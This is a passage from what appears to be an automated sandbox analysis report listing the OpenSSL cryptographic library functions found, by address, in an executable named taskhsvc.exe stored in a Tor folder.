            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBD065 pqueue_pop,CRYPTO_free,CRYPTO_free,pitem_free,86_2_6CDBD065
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCB01C CRYPTO_lock,X509_STORE_CTX_get_ex_new_index,86_2_6CDCB01C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAE005 CRYPTO_free,86_2_6CDAE005
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD8039 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,ERR_put_error,86_2_6CDD8039
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD4EA0 X509_get_pubkey,EVP_PKEY_copy_parameters,EVP_PKEY_free,ERR_clear_error,X509_check_private_key,EVP_PKEY_free,CRYPTO_add_lock,X509_check_private_key,ERR_clear_error,X509_check_private_key,RSA_flags,X509_free,ERR_put_error,ERR_put_error,EVP_PKEY_free,__stack_chk_fail,__stack_chk_fail,86_2_6CDD4EA0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA2027 CRYPTO_malloc,ERR_put_error,86_2_6CDA2027
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD0022 CRYPTO_lock,lh_retrieve,CRYPTO_lock,86_2_6CDD0022
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD21D2 CRYPTO_malloc,CRYPTO_free,sk_new_null,CRYPTO_free,sk_dup,sk_free,sk_free,sk_set_cmp_func,sk_sort,86_2_6CDD21D2
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA81C9 CRYPTO_lock,CRYPTO_lock,CRYPTO_malloc,ERR_put_error,86_2_6CDA81C9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBD1C7 pqueue_pop,CRYPTO_free,CRYPTO_free,pitem_free,86_2_6CDBD1C7
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC41F0 SSL_CTX_set_generate_session_id,CRYPTO_lock,CRYPTO_lock,86_2_6CDC41F0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD96192 i2d_SSL_SESSION,CRYPTO_malloc,EVP_CIPHER_CTX_init,HMAC_CTX_init,i2d_SSL_SESSION,d2i_SSL_SESSION,i2d_SSL_SESSION,i2d_SSL_SESSION,SSL_SESSION_free,BUF_MEM_grow,EVP_CIPHER_CTX_iv_length,EVP_CIPHER_CTX_iv_length,EVP_EncryptUpdate,EVP_EncryptFinal,HMAC_Update,HMAC_Final,EVP_CIPHER_CTX_cleanup,HMAC_CTX_cleanup,CRYPTO_free,86_2_6CD96192
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCB190 CRYPTO_malloc,RSA_up_ref,DHparams_dup,BN_dup,BN_dup,EC_KEY_dup,CRYPTO_add_lock,CRYPTO_add_lock,X509_chain_up_ref,CRYPTO_malloc,EVP_sha1,EVP_sha1,EVP_sha1,EVP_sha1,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_add_lock,CRYPTO_add_lock,ERR_put_error,RSA_free,DH_free,EC_KEY_free,X509_free,EVP_PKEY_free,sk_pop_free,CRYPTO_free,ERR_put_error,ERR_put_error,__stack_chk_fail,86_2_6CDCB190
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC9E80 SSL_CTX_get_quiet_shutdown,__stack_chk_fail,SSL_set_quiet_shutdown,__stack_chk_fail,SSL_get_quiet_shutdown,__stack_chk_fail,SSL_set_shutdown,__stack_chk_fail,SSL_get_shutdown,__stack_chk_fail,SSL_version,__stack_chk_fail,SSL_get_SSL_CTX,__stack_chk_fail,SSL_set_SSL_CTX,CRYPTO_add_lock,CRYPTO_add_lock,OpenSSLDie,memcmp,__stack_chk_fail,SSL_CTX_set_default_verify_paths,__stack_chk_fail,SSL_CTX_load_verify_locations,__stack_chk_fail,X509_STORE_set_default_paths,X509_STORE_load_locations,86_2_6CDC9E80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAE195 CRYPTO_free,86_2_6CDAE195
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA7180 ERR_put_error,ERR_put_error,CRYPTO_memcmp,OpenSSLDie,ERR_put_error,OpenSSLDie,__stack_chk_fail,86_2_6CDA7180
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCF1BD CRYPTO_add_lock,abort,memcmp,time,CRYPTO_lock,lh_retrieve,CRYPTO_add_lock,CRYPTO_lock,CRYPTO_add_lock,ERR_put_error,SSL_CTX_add_session,CRYPTO_add_lock,CRYPTO_lock,lh_retrieve,CRYPTO_lock,lh_delete,CRYPTO_lock,SSL_SESSION_free,86_2_6CDCF1BD
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAE1BC CRYPTO_free,86_2_6CDAE1BC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAE1AC CRYPTO_free,86_2_6CDAE1AC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC91A0 SSL_set_accept_state,EVP_CIPHER_CTX_cleanup,CRYPTO_free,EVP_CIPHER_CTX_cleanup,CRYPTO_free,COMP_CTX_free,COMP_CTX_free,EVP_MD_CTX_destroy,EVP_MD_CTX_destroy,__stack_chk_fail,86_2_6CDC91A0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC51A0 SSL_get_peer_certificate,CRYPTO_add_lock,86_2_6CDC51A0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB2159 CRYPTO_free,86_2_6CDB2159
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD9159 ERR_put_error,asn1_add_error,SSL_SESSION_free,d2i_ASN1_OCTET_STRING,d2i_ASN1_OCTET_STRING,CRYPTO_free,ASN1_INTEGER_get,CRYPTO_free,ASN1_INTEGER_get,CRYPTO_free,X509_free,ASN1_INTEGER_get,CRYPTO_free,ASN1_INTEGER_get,CRYPTO_free,asn1_const_Finish,ASN1_get_object,ASN1_get_object,d2i_ASN1_OCTET_STRING,d2i_ASN1_INTEGER,d2i_ASN1_INTEGER,ASN1_get_object,ASN1_get_object,ASN1_get_object,ASN1_get_object,d2i_ASN1_OCTET_STRING,BUF_strndup,CRYPTO_free,d2i_ASN1_INTEGER,d2i_ASN1_INTEGER,d2i_ASN1_OCTET_STRING,CRYPTO_free,d2i_ASN1_INTEGER,d2i_ASN1_INTEGER,d2i_ASN1_INTEGER,ASN1_const_check_infinite_end,d2i_ASN1_OCTET_STRING,ASN1_const_check_infinite_end,ASN1_const_check_infinite_end,ASN1_const_check_infinite_end,d2i_ASN1_INTEGER,ASN1_const_check_infinite_end,86_2_6CDD9159
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9F17B CRYPTO_free,DH_free,EC_KEY_free,sk_pop_free,BIO_free,CRYPTO_free,SSL_SRP_CTX_free,OPENSSL_cleanse,CRYPTO_free,86_2_6CD9F17B
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDE177 CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,ERR_put_error,86_2_6CDDE177
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCF170 CRYPTO_add_lock,abort,memcmp,__stack_chk_fail,86_2_6CDCF170
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC5160 SSL_pending,__stack_chk_fail,SSL_get_peer_certificate,CRYPTO_add_lock,__stack_chk_fail,SSL_get_peer_cert_chain,__stack_chk_fail,86_2_6CDC5160
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCD109 OPENSSL_DIR_end,CRYPTO_lock,ERR_put_error,86_2_6CDCD109
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCF107 CRYPTO_add_lock,__stack_chk_fail,86_2_6CDCF107
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD6F30 SSL_CTX_use_PrivateKey,X509_get_pubkey,EVP_PKEY_copy_parameters,EVP_PKEY_free,ERR_clear_error,X509_check_private_key,EVP_PKEY_free,CRYPTO_add_lock,X509_check_private_key,ERR_clear_error,X509_check_private_key,RSA_flags,X509_free,ERR_put_error,ERR_put_error,EVP_PKEY_free,86_2_6CDD6F30
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD52D8 X509_get_pubkey,EVP_PKEY_copy_parameters,ERR_clear_error,X509_check_private_key,EVP_PKEY_free,X509_free,CRYPTO_add_lock,EVP_PKEY_free,ERR_clear_error,ERR_put_error,RSA_flags,ERR_put_error,EVP_PKEY_free,86_2_6CDD52D8
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD22D2 CRYPTO_malloc,CRYPTO_free,sk_new_null,CRYPTO_free,sk_dup,sk_free,sk_free,sk_set_cmp_func,sk_sort,86_2_6CDD22D2
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAF2FB strlen,strlen,SSL_get_ciphers,sk_num,ERR_put_error,SSL_ctrl,SSL_get_srtp_profiles,CRYPTO_malloc,sk_value,i2d_OCSP_RESPID,sk_num,i2d_X509_EXTENSIONS,sk_value,i2d_OCSP_RESPID,sk_num,i2d_X509_EXTENSIONS,ERR_put_error,86_2_6CDAF2FB
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE44E40 DES_cbc_encrypt,DES_encrypt1,DES_encrypt1,86_2_6CE44E40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE5EE40 SEED_cbc_encrypt,86_2_6CE5EE40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE66E20 CRYPTO_ccm128_encrypt_ccm64,__stack_chk_fail,86_2_6CE66E20
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE26E30 ERR_load_CRYPTO_strings,ERR_func_error_string,86_2_6CE26E30
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE22E30 CRYPTO_set_mem_debug_functions,OPENSSL_init,86_2_6CE22E30
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF6EE20 OPENSSL_asc2uni,CRYPTO_malloc,strlen,__stack_chk_fail,86_2_6CF6EE20
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CED2E30 sk_deep_copy,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,__stack_chk_fail,86_2_6CED2E30
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEE0E30 EVP_EncryptUpdate,OpenSSLDie,__stack_chk_fail,OpenSSLDie,86_2_6CEE0E30
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF04E10 d2i_PUBKEY,ASN1_item_d2i,CRYPTO_add_lock,ASN1_item_free,EVP_PKEY_free,86_2_6CF04E10
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CECEE00 BIO_accept,accept,BIO_sock_should_retry,WSAGetLastError,ERR_put_error,ERR_put_error,__stack_chk_fail,BIO_set_tcp_ndelay,setsockopt,__stack_chk_fail,BIO_socket_nbio,ioctlsocket,WSAGetLastError,ERR_put_error,__stack_chk_fail,CRYPTO_malloc,__stack_chk_fail,BIO_clear_flags,__stack_chk_fail,ERR_put_error,86_2_6CECEE00
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE24E0C CRYPTO_lock,CRYPTO_lock,86_2_6CE24E0C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF44E00 X509_LOOKUP_file,__stack_chk_fail,X509_load_cert_file,__stack_chk_fail,__stack_chk_fail,X509_load_crl_file,__stack_chk_fail,X509_load_cert_crl_file,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,CRYPTO_malloc,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,86_2_6CF44E00
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE4CE10 AES_ctr128_encrypt,CRYPTO_ctr128_encrypt,86_2_6CE4CE10
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF6AFF0 PKCS12_unpack_p7encdata,OBJ_obj2nid,PKCS12_SAFEBAGS_it,PKCS12_item_decrypt_d2i,__stack_chk_fail,86_2_6CF6AFF0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE62FF0 CRYPTO_gcm128_init,86_2_6CE62FF0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE5EFC0 CRYPTO_cbc128_encrypt,__stack_chk_fail,86_2_6CE5EFC0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE22FD0 CRYPTO_get_locked_mem_functions,86_2_6CE22FD0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF2EFC0 PEM_read_bio_PrivateKey,PEM_bytes_read_bio,d2i_X509_SIG,PKCS8_decrypt,ERR_put_error,CRYPTO_free,OPENSSL_cleanse,CRYPTO_free,EVP_PKEY_asn1_find_str,d2i_PrivateKey,d2i_PKCS8_PRIV_KEY_INFO,EVP_PKCS82PKEY,EVP_PKEY_free,PKCS8_PRIV_KEY_INFO_free,ERR_put_error,X509_SIG_free,PEM_def_callback,__stack_chk_fail,PEM_write_bio_PrivateKey,PEM_write_bio_PKCS8PrivateKey,BIO_snprintf,PEM_ASN1_write_bio,__stack_chk_fail,86_2_6CF2EFC0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF36FB0 NETSCAPE_SPKI_b64_encode,i2d_NETSCAPE_SPKI,CRYPTO_malloc,CRYPTO_malloc,i2d_NETSCAPE_SPKI,EVP_EncodeBlock,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_put_error,86_2_6CF36FB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEFAFA0 ASN1_GENERALIZEDTIME_set,OPENSSL_gmtime,CRYPTO_malloc,CRYPTO_free,BIO_snprintf,strlen,ERR_put_error,86_2_6CEFAFA0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE22F40 CRYPTO_get_mem_ex_functions,86_2_6CE22F40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE4AFB0 DES_xcbc_encrypt,DES_encrypt1,DES_encrypt1,86_2_6CE4AFB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEBEFB0 ENGINE_load_private_key,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,ERR_put_error,ERR_put_error,ERR_put_error,86_2_6CEBEFB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CED2FB0 sk_new_null,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,__stack_chk_fail,86_2_6CED2FB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE58F80 CAST_ecb_encrypt,CAST_decrypt,__stack_chk_fail,CAST_encrypt,86_2_6CE58F80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE84F80 ERR_put_error,CRYPTO_malloc,__stack_chk_fail,86_2_6CE84F80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEF4F80 EVP_PKEY_CTX_new_id,ENGINE_init,ENGINE_get_pkey_meth,CRYPTO_malloc,ENGINE_get_pkey_meth_engine,sk_find,OBJ_bsearch_,EVP_PKEY_free,EVP_PKEY_free,ENGINE_finish,CRYPTO_free,sk_value,ERR_put_error,ERR_put_error,ENGINE_finish,ERR_put_error,__stack_chk_fail,86_2_6CEF4F80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEA4F90 RSAPublicKey_dup,ASN1_item_dup,__stack_chk_fail,RSAPrivateKey_dup,ASN1_item_dup,__stack_chk_fail,RSA_generate_key,RSA_new,BN_new,BN_free,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,i2d_RSAPublicKey,__stack_chk_fail,d2i_RSAPrivateKey,ERR_put_error,__stack_chk_fail,i2d_RSAPrivateKey,ERR_put_error,__stack_chk_fail,BN_cmp,BN_cmp,__stack_chk_fail,X509_PUBKEY_get0_param,d2i_RSAPublicKey,ERR_put_error,__stack_chk_fail,BN_num_bits,CRYPTO_malloc,BIO_indent,CRYPTO_free,BIO_printf,ERR_put_error,__stack_chk_fail,86_2_6CEA4F90
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF24F70 i2d_ASN1_bytes,__stack_chk_fail,d2i_ASN1_bytes,ASN1_STRING_new,ASN1_get_object,ASN1_get_object,CRYPTO_free,ASN1_const_check_infinite_end,ASN1_STRING_new,CRYPTO_malloc,CRYPTO_free,__stack_chk_fail,86_2_6CF24F70
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE5EF60 SEED_ofb128_encrypt,CRYPTO_ofb128_encrypt,86_2_6CE5EF60
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF1CF60 X509_PKEY_new,CRYPTO_malloc,X509_ALGOR_new,ASN1_STRING_type_new,ERR_put_error,__stack_chk_fail,86_2_6CF1CF60
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF3AF60 X509_STORE_CTX_init,X509_VERIFY_PARAM_new,X509_VERIFY_PARAM_inherit,ERR_put_error,X509_policy_tree_free,sk_pop_free,CRYPTO_free_ex_data,CRYPTO_new_ex_data,ERR_put_error,X509_VERIFY_PARAM_free,__stack_chk_fail,X509_VERIFY_PARAM_lookup,X509_VERIFY_PARAM_inherit,86_2_6CF3AF60
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE4AF70 DES_crypt,DES_fcrypt,86_2_6CE4AF70
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE22F40 CRYPTO_get_mem_ex_functions,86_2_6CE22F40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE24F49 CRYPTO_THREADID_current,CRYPTO_lock,CRYPTO_lock,lh_delete,CRYPTO_free,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,86_2_6CE24F49
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE22EB0 CRYPTO_get_mem_functions,__stack_chk_fail,CRYPTO_get_mem_ex_functions,__stack_chk_fail,CRYPTO_get_locked_mem_functions,__stack_chk_fail,CRYPTO_get_locked_mem_ex_functions,__stack_chk_fail,CRYPTO_get_mem_debug_functions,86_2_6CE22EB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEE2F30 EVP_CIPHER_CTX_copy,ENGINE_init,OPENSSL_cleanse,CRYPTO_free,ENGINE_finish,CRYPTO_malloc,ERR_put_error,ERR_put_error,86_2_6CEE2F30
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE24F00 CRYPTO_dbg_free,CRYPTO_THREADID_current,CRYPTO_lock,CRYPTO_lock,lh_delete,CRYPTO_free,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,CRYPTO_free,CRYPTO_free,CRYPTO_THREADID_cmp,CRYPTO_lock,CRYPTO_free,CRYPTO_free,86_2_6CE24F00
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE248E7 CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,CRYPTO_free,86_2_6CE248E7
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE4C8F0 _ossl_old_des_ofb64_encrypt,86_2_6CE4C8F0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE268F9 CRYPTO_lock,86_2_6CE268F9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE248C9 CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,CRYPTO_free,86_2_6CE248C9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE2A8D9 ASN1_OBJECT_free,CRYPTO_free,86_2_6CE2A8D9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE4C880 _ossl_old_des_cfb64_encrypt,86_2_6CE4C880
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEAA880 DSA_generate_parameters_ex,EVP_sha256,EVP_MD_size,EVP_sha1,__stack_chk_fail,EVP_MD_CTX_init,EVP_MD_size,CRYPTO_malloc,BN_CTX_new,BN_MONT_CTX_new,BN_CTX_start,BN_CTX_get,BN_CTX_get,BN_CTX_get,BN_CTX_get,BN_CTX_get,BN_CTX_get,BN_value_one,BN_sub,CRYPTO_free,CRYPTO_free,BN_CTX_end,BN_CTX_free,BN_MONT_CTX_free,EVP_MD_CTX_cleanup,BN_div,BN_MONT_CTX_set,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,BN_bin2bn,BN_mod_exp_mont,EVP_sha256,BN_CTX_get,BN_CTX_get,BN_value_one,BN_lshift,BN_GENCB_call,EVP_Digest,BN_bin2bn,BN_is_prime_fasttest_ex,BN_GENCB_call,BN_GENCB_call,BN_set_word,EVP_Digest,BN_bin2bn,BN_lshift,BN_add,BN_mask_bits,BN_copy,BN_add,BN_lshift1,BN_div,BN_value_one,BN_sub,BN_sub,BN_cmp,BN_is_prime_fasttest_ex,BN_GENCB_call,CRYPTO_malloc,EVP_sha224,EVP_sha1,BN_set_word,BN_value_one,BN_add,RAND_bytes,BN_GENCB_call,BN_free,BN_dup,BN_free,BN_dup,BN_free,BN_dup,ERR_put_error,ERR_put_error,__stack_chk_fail,BN_GENCB_call,86_2_6CEAA880
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE2288C CRYPTO_get_dynlock_value,__stack_chk_fail,OpenSSLDie,86_2_6CE2288C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF4C880 X509V3_add_value_uchar,BUF_strdup,BUF_strdup,CRYPTO_malloc,sk_push,ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_put_error,sk_new_null,__stack_chk_fail,X509V3_add_value_bool,BUF_strdup,BUF_strdup,CRYPTO_malloc,sk_push,ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_put_error,ERR_put_error,ERR_put_error,sk_new_null,__stack_chk_fail,X509V3_add_value_bool_nf,86_2_6CF4C880
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE60890 CRYPTO_cts128_encrypt_block,CRYPTO_cbc128_encrypt,86_2_6CE60890
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF78880 UI_get_input_flags,__stack_chk_fail,UI_get0_output_string,__stack_chk_fail,UI_get0_action_string,__stack_chk_fail,UI_get0_result_string,__stack_chk_fail,UI_get0_test_string,__stack_chk_fail,UI_get_result_minsize,__stack_chk_fail,UI_get_result_maxsize,__stack_chk_fail,UI_set_result,strlen,__stack_chk_fail,__stack_chk_fail,_iob,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,fopen,fopen,_iob,_iob,__stack_chk_fail,UI_get_string_type,__stack_chk_fail,signal,86_2_6CF78880
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEC4890 BIO_vfree,CRYPTO_add_lock,CRYPTO_free_ex_data,__stack_chk_fail,86_2_6CEC4890
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE2689C CRYPTO_lock,CRYPTO_lock,86_2_6CE2689C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE26870 CRYPTO_cleanup_all_ex_data,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,86_2_6CE26870
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE80870 BN_GF2m_mod_solve_quad,BN_num_bits,CRYPTO_malloc,ERR_put_error,CRYPTO_free,BN_GF2m_mod_solve_quad_arr,86_2_6CE80870
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF6C850 PKCS12_pbe_crypt,EVP_CIPHER_CTX_init,EVP_PBE_CipherInit,EVP_CIPHER_CTX_block_size,CRYPTO_malloc,EVP_CipherUpdate,EVP_CipherFinal_ex,EVP_CIPHER_CTX_cleanup,86_2_6CF6C850
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF72850 OCSP_sendreq_new,CRYPTO_malloc,BIO_s_mem,BIO_new,CRYPTO_malloc,BIO_printf,OCSP_REQUEST_it,ASN1_item_i2d,BIO_printf,ASN1_item_i2d_bio,BIO_free,CRYPTO_free,CRYPTO_free,BIO_free,CRYPTO_free,CRYPTO_free,__stack_chk_fail,86_2_6CF72850
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE26849 CRYPTO_lock,86_2_6CE26849
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE68850 CRYPTO_128_unwrap,memmove,memcmp,OPENSSL_cleanse,__stack_chk_fail,86_2_6CE68850
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF64840 PKCS7_add_certificate,OBJ_obj2nid,CRYPTO_add_lock,sk_push,ERR_put_error,X509_free,ERR_put_error,sk_new_null,__stack_chk_fail,86_2_6CF64840
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEEA850 EVP_rc2_64_cbc,__stack_chk_fail,EVP_rc2_40_cbc,__stack_chk_fail,__stack_chk_fail,EVP_CIPHER_CTX_key_length,CAST_set_key,__stack_chk_fail,CAST_cfb64_encrypt,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,EVP_cast5_cbc,__stack_chk_fail,EVP_cast5_cfb64,__stack_chk_fail,EVP_cast5_ofb,__stack_chk_fail,EVP_cast5_ecb,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,EVP_md_null,__stack_chk_fail,86_2_6CEEA850
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF6E830 PKCS12_set_mac,PKCS12_MAC_DATA_new,ASN1_STRING_type_new,ASN1_INTEGER_set,CRYPTO_malloc,EVP_MD_type,OBJ_nid2obj,ASN1_TYPE_new,OBJ_obj2nid,ASN1_STRING_set,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,RAND_bytes,EVP_sha1,__stack_chk_fail,PKCS12_setup_mac,PKCS12_MAC_DATA_new,ASN1_STRING_type_new,ASN1_INTEGER_set,CRYPTO_malloc,EVP_MD_type,OBJ_nid2obj,ASN1_TYPE_new,ERR_put_error,RAND_bytes,ERR_put_error,__stack_chk_fail,86_2_6CF6E830
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE22830 CRYPTO_lock,__stack_chk_fail,OpenSSLDie,86_2_6CE22830
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE50830 AES_cbc_encrypt,86_2_6CE50830
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE72830 BN_mod_lshift_quick,BN_copy,BN_num_bits,BN_num_bits,BN_lshift1,BN_cmp,BN_sub,BN_lshift,ERR_put_error,__stack_chk_fail,BN_mod_lshift,BN_div,__stack_chk_fail,BN_bn2hex,CRYPTO_strdup,__stack_chk_fail,86_2_6CE72830
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEEC830 EVP_PKEY_new,CRYPTO_malloc,ERR_put_error,__stack_chk_fail,86_2_6CEEC830
